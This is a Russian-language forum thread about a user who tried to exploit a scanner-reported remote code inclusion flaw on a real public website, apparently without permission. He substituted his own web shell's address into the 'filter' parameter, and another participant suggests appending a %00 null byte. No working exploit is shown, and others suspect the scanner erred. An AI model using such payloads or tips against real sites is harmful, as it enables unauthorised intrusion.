![]() |
Выполнение кода с удаленного сервера
И так я создаю новую тему и не судите меня да не судимы будете (так как мне наврятли ответят в теме специальной) :D лан начнем...
И так насканил (xspider прогой) я тут сайт там обнаружилась серьезная уязвимость с описанием таким вот " Возможно выполнение атаки "Code Injection". Это может позволить атакующему выполнить произвольный код на вашей системе, взятый с удаленного сервера. Запрос для выполнения атаки: http://sait.com/news/?filter=http://wwwwwwww/ " что еще за код инжект? я сначало подумал(прочитав описание) что нужно указывать путь до шелла вместо "http://wwwwwww/" но указав путь до моего шелла (хост не поддерживает php) шелл был как и в .txt формате как и .php (просто я уже не помню в каком формате надо указывать) у меня ничего не вышло..... Есть какие идеи? Или это не может быть вообще уязв? |
да я так тоже думаю
там аж нету ошибки на сайте если ставить всякие слеши в том случае но все таки интересует! |
Не факт, что ошибка появится.
А скорее всего XSpider просто ошибся. |
Пробуй тот же запрос с "ядовитым нулём" на конце: %00
|
diehard да не это спайдер ошибся так как он ща почему то не выдает такую ошибку при скане (вроде как) не помогает все равно
|
Ссылку в студию, и посмотрим.
|
http://store.steampowered.com/news/?filter=http://wwwwwwww/&appids=440
произошло все тут а точнее выдал такую вот сылку в спайдере |
Цитата:
|
| Время: 21:24 |